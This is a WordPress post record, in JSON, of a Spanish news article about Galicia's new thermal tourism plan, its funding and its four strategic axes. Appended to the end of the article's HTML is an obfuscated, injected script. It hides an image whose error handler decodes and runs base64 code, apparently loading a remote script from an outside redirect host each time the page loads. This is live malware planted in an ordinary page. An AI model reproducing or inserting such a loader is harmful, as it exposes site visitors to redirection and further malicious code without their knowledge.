{"id":9151,"date":"2025-01-17T18:50:58","date_gmt":"2025-01-17T21:50:58","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=9151"},"modified":"2025-08-13T15:33:31","modified_gmt":"2025-08-13T18:33:31","slug":"rueda-presenta-el-nuevo-plan-termal-como-hoja-de-ruta-para-afianzar-galicia-como-potencia-en-el-sector","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=9151","title":{"rendered":"Rueda presenta el nuevo Plan Termal como \u00abhoja de ruta\u00bb para afianzar Galicia como potencia en el sector"},"content":{"rendered":"\n<h5 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-8fc600b66d19ab0ec93a0d1ceeabbb3d\" style=\"background-color:#2c5f7d\"><em>En el Teatro Principal de Ourense, el presidente de la Xunta, acompa\u00f1ado del director de la Axencia de Turismo de Galicia, Xos\u00e9 Merelles; del presidente provincial, Luis Menor; y del delegado del Gobierno, Pedro Blanco, ha trasladado los puntos de este plan termal dise\u00f1ado para ejecutarse durante esta legislatura y que busca posicionar la imagen de Galicia como referente internacional del termalismo.<\/em><\/h5>\n\n\n\n<p>\u00ab&#8216;Galicia calidade&#8217; tiene una de sus manifestaciones en el termalismo, un tesoro que es una marca de identidad y una oportunidad\u00bb, ha subrayado Rueda durante la presentaci\u00f3n del plan, que estar\u00e1 dotado de 10 millones de euros y se estructura alrededor de cuatro grandes ejes.<\/p>\n\n\n\n<p>En primer lugar, ponen el foco en el conocimiento y la innovaci\u00f3n mediante la creaci\u00f3n de un observatorio de investigaci\u00f3n, manuales de buenas pr\u00e1cticas y programas de formaci\u00f3n especializada, con el objetivo de hacer el sector m\u00e1s sostenible y rentable.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-full is-resized\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\" noreferrer noopener\"><img decoding=\"async\" width=\"545\" height=\"810\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/01\/473798869_1138820851135639_2874208356629818943_n-1.jpg\" alt=\"\" class=\"wp-image-9155\" style=\"width:259px;height:auto\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/01\/473798869_1138820851135639_2874208356629818943_n-1.jpg 545w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/01\/473798869_1138820851135639_2874208356629818943_n-1-202x300.jpg 202w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/01\/473798869_1138820851135639_2874208356629818943_n-1-283x420.jpg 283w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/01\/473798869_1138820851135639_2874208356629818943_n-1-320x476.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/01\/473798869_1138820851135639_2874208356629818943_n-1-480x713.jpg 480w\" sizes=\"(max-width: 545px) 100vw, 545px\" \/><\/a><figcaption class=\"wp-element-caption\"><em><sup><mark class=\"has-inline-color has-vivid-cyan-blue-color\">Publicidad<\/mark><\/sup><\/em><\/figcaption><\/figure>\n<\/div>\n\n\n<p>INVERSI\u00d3N Y MODERNIZACI\u00d3N<\/p>\n\n\n\n<p>El segundo eje se centra en la inversi\u00f3n y modernizaci\u00f3n, incluyendo una partida de ocho millones de euros destinados a mejorar las infraestructuras y servicios existentes, as\u00ed como para la creaci\u00f3n de nuevas instalaciones que completan la oferta actual.<\/p>\n\n\n\n<p>En este apartado no se ha hecho referencia exacta a ning\u00fan hotel balneario nuevo en Ourense, pero en el propio plan, a lo largo de m\u00e1s de cien p\u00e1ginas, se resalta la importancia de este tipo de establecimientos para el desarrollo del turismo termal en Galicia, y se habla de que varias capitales europeas procedentes de \u00abpa\u00edses eminentemente termales\u00bb est\u00e1n equipadas con el balneario que \u00abacaba siendo la imagen termal del pa\u00eds\u00bb.<\/p>\n\n\n\n<p>As\u00ed pues, tom\u00e1ndolas como referentes, la ubicaci\u00f3n est\u00e1 por estudiar, pero el proyecto de la Xunta recoge posibles localizaciones y ejemplos a imitar.<\/p>\n\n\n\n<p>En este sentido, habla de la \u00abrecuperaci\u00f3n y reconversi\u00f3n de un edificio hist\u00f3rico\u00bb y traslada que \u00absi no es posible\u00bb otra opci\u00f3n es \u00abuna nueva construcci\u00f3n vanguardista\u00bb proporcionando como ejemplo el hotel termal Aqua Dome, en Tirol, Austria.<\/p>\n\n\n\n<p>El plan se centra as\u00ed en estrategias generales para atraer inversi\u00f3n y promover la modernizaci\u00f3n de las instalaciones termales existentes y mencionan la importancia de aprovechar los recursos naturales de distintos modos.<\/p>\n\n\n\n<p>En este sentido, Rueda ha subrayado la importancia de \u00abexplotar much\u00edsimo m\u00e1s\u00bb el termalismo en el apartado de la salud, porque \u00abel termalismo cura, el termalismo sana y hay muchas maneras de curar tradicionales que tienen aqu\u00ed un complemento perfecto\u00bb.<\/p>\n\n\n\n<p>Tambi\u00e9n ha apostado el presidente de la Xunta por una perspectiva empresarial, asegurando que quieren apoyar \u00aba todas las empresas y emprendedores que decidan arriesgar su dinero en el termalismo\u00bb, proporcionando ayudas econ\u00f3micas y ayudas promocionales e \u00abintentando eliminar cada vez m\u00e1s los atrancos burocr\u00e1ticos, que retrasan inversiones y a veces, por desgracia, desaniman\u00bb.<\/p>\n\n\n\n<p>El tercer eje de esta hoja de ruta es la apuesta por la gesti\u00f3n y la colaboraci\u00f3n, promoviendo una coordinaci\u00f3n efectiva entre las distintas administraciones implicadas y aprovechando recursos como los fondos europeos Next generation, \u00abque hacen posible impulsar planes territoriales de sostenibilidad tur\u00edstica\u00bb en la comunidad.<\/p>\n\n\n\n<p>Por \u00faltimo, el cuarto eje est\u00e1 enfocado en la promoci\u00f3n y diversificaci\u00f3n con iniciativas como el programa Galicia Spa Pilgrimage, que combina la experiencia del camino de Santiago con la oferta termal gallega, para ofrecer nuevas alternativas tur\u00edsticas.<\/p>\n\n\n\n<p>EL TERMALISMO EN LA DESESTACIONALIZACI\u00d3N TUR\u00cdSTICA<\/p>\n\n\n\n<p>En el turismo ha puesto el foco Alfonso Rueda asegurando que \u00abel termalismo tiene un papel protagonista en el auge de la desestacionalizaci\u00f3n\u00bb, que es uno de los objetivos que se enmarcan en la estrategia de turismo de Galicia 2030.<\/p>\n\n\n\n<p>En esta l\u00ednea, el mandatario auton\u00f3mico ha resaltado que \u00abes fundamental\u00bb seguir atrayendo turistas a Galicia \u00abaunque de forma ordenada y con sentidi\u00f1o\u00bb. \u00abSomos una tierra acogedora, aqu\u00ed no sobra nadie\u00bb, ha defendido para trasladar que \u00abterra acolledora\u00bb ser\u00e1 el lema con el que Galicia vuelve a estar representada en Fitur, \u00abla mayor feria de turismo que se hace en el mundo\u00bb.<\/p>\n\n\n\n<p>Para concluir, Rueda ha manifestado que Galicia \u00abya es una potencia termal en toda Europa y en todo el mundo\u00bb y \u00ablo que tenemos que hacer es simplemente mantener todo eso y mejorar, sin competir con nadie, pero teniendo presente que hay mucha gente que nos quiere sacar de esa posici\u00f3n, porque ven en el turismo y en el termalismo que ofrece Galicia una enorme oportunidad\u00bb.<\/p>\n\n\n\n<p>Por su parte, el presidente de la Diputaci\u00f3n Provincial, Luis Menor, ha defendido durante su intervenci\u00f3n la innovaci\u00f3n que aporta el organismo ourensano para desarrollar el termalismo en la provincia.<\/p>\n\n\n\n<p>As\u00ed, en materia de innovaci\u00f3n en el \u00e1mbito termal, Menor ha avanzado que la Diputaci\u00f3n ha acordado con Adif la apertura de la primera oficina de informaci\u00f3n sobre termalismo, situada en una estaci\u00f3n de Alta Velocidad en toda Espa\u00f1a.<\/p>\n\n\n\n<p>Se trata de un espacio que, seg\u00fan sus palabras, ser\u00e1 \u00abpor y para los balnearios\u00bb y tendr\u00e1 como objetivo que \u00abcientos de miles de personas\u00bb, que anualmente pasan por la Intermodal de Ourense, tengan a su disposici\u00f3n informaci\u00f3n termal, puedan acceder a promociones y, \u00absobre todo, asocien la alta velocidad ferroviaria con la posibilidad de proximidad a los balnearios ourensanos\u00bb.<\/p>\n\n\n\n<p>Asimismo, Menor ha subrayado que el termalismo \u00abes parte de la idiosincrasia de Ourense\u00bb y ha hecho un repaso a acciones singulares como los planes de sostenibilidad \u00abOurense termal\u00bb y \u00abOurense colle velocidade\u00bb en colaboraci\u00f3n con la Axencia de Turismo de Galicia y la Secretar\u00eda de Estado de Turismo.<\/p>\n\n\n\n<p>Adem\u00e1s, ha aprovechado la oportunidad para resaltar el programa &#8216;Ternalismo Social&#8217; provincial, que en las pr\u00f3ximas semanas dar\u00e1 a conocer \u00abun programa de respiro emocional a personas mayores afectadas por la DANA\u00bb.<\/p>\n\n\n\n<p>\u00abSomos conscientes de que tenemos un tesoro bajo nuestros pies en estado l\u00edquido\u00bb, ha concluido Menor.<\/p>\n\n\n\n<p>Por su parte, el delegado del Gobierno en Galicia, Pedro Blanco, ha querido recordar que durante estos a\u00f1os el Gobierno, a trav\u00e9s de la Secretar\u00eda de Estado de Turismo del Ministerio de Industria, aprob\u00f3 inversiones por valor de 13 millones de euros dirigidas al Turismo Termal gallego, y en esta inversi\u00f3n se incluye el programa Galicia Destino Termal que ejecuta la Xunta de Galicia con 10,5 millones de euros de fondos del Plan de Recuperaci\u00f3n de gobierno.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.europapress.es\/galicia\/turismo-00624\/noticia-rueda-presenta-nuevo-plan-turismo-termal-hoja-ruta-afianzar-galicia-potencia-sector-20250117165801.html\" target=\"_blank\" rel=\" noreferrer noopener\"><img decoding=\"async\" width=\"207\" height=\"55\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/01\/Captura-de-pantalla_17-1-2025_18445_www.msn_.com_.jpeg\" alt=\"\" class=\"wp-image-9153\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En el Teatro Principal de Ourense, el presidente de la Xunta, acompa\u00f1ado del director de la Axencia de Turismo de Galicia, Xos\u00e9 Merelles; del presidente provincial, Luis Menor; y del delegado del Gobierno, Pedro Blanco, ha trasladado los puntos de este plan termal dise\u00f1ado para ejecutarse durante esta legislatura y que busca posicionar la imagen [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":9152,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[31,28],"tags":[],"class_list":["post-9151","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-colaboradores","category-portales-de-servicios-e-informacion"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9151","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9151"}],"version-history":[{"count":4,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9151\/revisions"}],"predecessor-version":[{"id":10004,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9151\/revisions\/10004"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/9152"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9151"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9151"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9151"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}